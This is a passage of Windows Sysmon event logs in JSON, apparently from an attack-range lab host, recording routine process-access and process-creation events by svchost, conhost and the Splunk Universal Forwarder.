{"EventTime":"2020-08-01 06:49:17","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1920,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:17.771\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:17.771","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:19","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:17","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1921,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:17.771\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:17.771","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:19","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:17","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1922,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:17.771\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:17.771","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:19","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:17","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1923,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:17.771\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:17.771","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:19","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:17","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1924,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:17.771\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:17.771","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:19","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:17","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1925,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:17.771\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:17.771","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:19","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:17","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1926,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:17.771\r\nSourceProcessGUID: {E2A3D6B1-106C-5F25-0000-0010ED600300}\r\nSourceProcessId: 3816\r\nSourceThreadId: 3836\r\nSourceImage: C:\\Windows\\system32\\conhost.exe\r\nTargetProcessGUID: {E2A3D6B1-106C-5F25-0000-0010B3840300}\r\nTargetProcessId: 4056\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:17.771","SourceProcessGUID":"{E2A3D6B1-106C-5F25-0000-0010ED600300}","SourceProcessId":"3816","SourceThreadId":"3836","SourceImage":"C:\\Windows\\system32\\conhost.exe","TargetProcessGUID":"{E2A3D6B1-106C-5F25-0000-0010B3840300}","TargetProcessId":"4056","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:19","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:17","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":1,"OpcodeValue":0,"RecordNumber":1927,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process Create:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:17.789\r\nProcessGuid: {E2A3D6B1-106D-5F25-0000-0010A8DA0300}\r\nProcessId: 3464\r\nImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nFileVersion: 8.0.2\r\nDescription: splunkd service\r\nProduct: splunk Application\r\nCompany: Splunk Inc.\r\nOriginalFileName: splunkd.exe\r\nCommandLine: \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE\" btool check --no-log\r\nCurrentDirectory: C:\\Windows\\system32\\\r\nUser: NT AUTHORITY\\SYSTEM\r\nLogonGuid: {E2A3D6B1-1058-5F25-0000-0020E7030000}\r\nLogonId: 0x3E7\r\nTerminalSessionId: 0\r\nIntegrityLevel: System\r\nHashes: MD5=B6D66AB97239BFB32F1CC9B8BFE1B4E0,SHA256=9D5EC3AA587B29840BE53E8E11B1C3BFE2FA3413DD65459325CBEEAFA66D3975,IMPHASH=CD69F86EE9B3C12390F5C7499BD3A589\r\nParentProcessGuid: {E2A3D6B1-106D-5F25-0000-00109FD90300}\r\nParentProcessId: 4056\r\nParentImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe\r\nParentCommandLine: \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool\" check --no-log","Category":"Process Create (rule: ProcessCreate)","Opcode":"Info","UtcTime":"2020-08-01 06:49:17.789","ProcessGuid":"{E2A3D6B1-106D-5F25-0000-0010A8DA0300}","Image":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","FileVersion":"8.0.2","Description":"splunkd service","Product":"splunk Application","Company":"Splunk Inc.","OriginalFileName":"splunkd.exe","CommandLine":"\"C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE\" btool check --no-log","CurrentDirectory":"C:\\Windows\\system32\\","User":"NT AUTHORITY\\SYSTEM","LogonGuid":"{E2A3D6B1-1058-5F25-0000-0020E7030000}","LogonId":"0x3e7","TerminalSessionId":"0","IntegrityLevel":"System","Hashes":"MD5=B6D66AB97239BFB32F1CC9B8BFE1B4E0,SHA256=9D5EC3AA587B29840BE53E8E11B1C3BFE2FA3413DD65459325CBEEAFA66D3975,IMPHASH=CD69F86EE9B3C12390F5C7499BD3A589","ParentProcessGuid":"{E2A3D6B1-106D-5F25-0000-00109FD90300}","ParentProcessId":"4056","ParentImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe","ParentCommandLine":"\"C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool\" check --no-log","EventReceivedTime":"2020-08-01 06:49:19","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:17","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1928,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:17.786\r\nSourceProcessGUID: {E2A3D6B1-106D-5F25-0000-00109FD90300}\r\nSourceProcessId: 4056\r\nSourceThreadId: 4052\r\nSourceImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe\r\nTargetProcessGUID: {E2A3D6B1-106D-5F25-0000-0010A8DA0300}\r\nTargetProcessId: 3464\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe+239c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe+2568|C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe+2926|C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe+11cf|C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe+1245|C:\\Program 